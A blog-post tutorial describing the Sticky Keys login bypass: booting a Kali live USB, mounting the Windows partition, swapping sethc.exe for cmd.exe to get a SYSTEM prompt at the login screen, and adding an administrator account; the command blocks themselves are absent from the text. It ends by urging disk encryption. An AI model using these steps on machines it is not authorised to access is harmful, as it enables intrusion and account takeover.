Press "Enter" to skip to content

Bypassing Windows login with Linux

In this post we will see how easy is to access Windows protected files even bypass Windows login and modify the file system to create an admin user.

For this we are going to take advantage of a functionality installed by default in all Windows versions from Windows 95. This functionality is “Sticky keys” and it was introduced to assist users who have physical disabilities. It serializes keystrokes instead of pressing multiple keys at a time, allowing the user to press and release a modifier key, such as Shift, Ctrl, Alt, or the Windows key, and have it remain active until any other key is pressed.

To call this functionality all we have to do is press 5 times Shift key and then we will a prompt like this one:

The binary executed for this feature is “sethc.exe” located in “%WINDIR%\System32”. This functionality can be called even without having logged in. Therefore if we execute this binary without having started any session the binary will be executed with the user SYSTEM.

If we could modify that binary so that instead of sethc.exe a cmd.exe command line is invoked, then on the log in prompt we will have a command line with SYSTEM privileges 🙂

All we need is a USB with a live Linux distribution installed on it and then we will boot the PC from the USB and once inside Linux we will mount the Windows NTFS disk to access the file system.

NTFS is a proprietary file system created by Microsoft and is used extensively in Microsoft’s Windows operating systems. By default most Linux distributions are not able to mount NTFS, however it is possible to install a driver that allows us to do this so that we can read and write data to an NTFS disk. The “ntfs-3g package contains a stable, read-write open source driver for NTFS partitions.

In the following demo we will use an USB with Kali Linux (which includes the “ntfs-3g” package). I personally recommend always using the Rufus software to create the bootable USB.

Once inside Kali Linux we can list all partitions using “fdisk -l” and the largest NTFS partition is supossed to be our Windows partition. In this demo, our Windows partition will be /dev/sda2

Now, if we mount the Windows partition we will be able to read/copy/modify any file into the Windows filesystem. To mount the partition we can use the following commands:

Now if we list “win” directory we will see Windows filesystem:

NOTE: When trying to mount the partition the following error may appear:

This is because Windows 8 and later “Fast boot” options is enabled by default. So when we power off the computer it remains in an hibernated state. To bypass this issue the only thing we must do is reboot Windows instead of shutting it down.

Well, we have already mounted Windows filesystem, now we will modify “sethc.exe” binary to be “cmd.exe” using the following commands:

Now we can turn off Kali Linux, remove the USB and boot again on Windows. In the log in screen we can now press 5 times Shift key and a command line will prompt 🙂 If we check with “whoami” we will confirm that is running under SYSTEM user:

Now that we have SYSTEM privileges we can create a new user (Carlos for example) within Administrators group and access the computer with Admin privileges. We can use the following commands:

So with this post we have demonstrated that with a Linux live USB is possible to access any Windows computer and even create an Admin user.

This is the reason why we must always encrypt the hard drive of our personal computer!!!!!!

Until the next post 😉

One Comment

  1. Luci Mc Castro
    Luci Mc Castro 1 December, 2018

    Excelente y clasificadora exposición, como siempre. Gracias!!!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.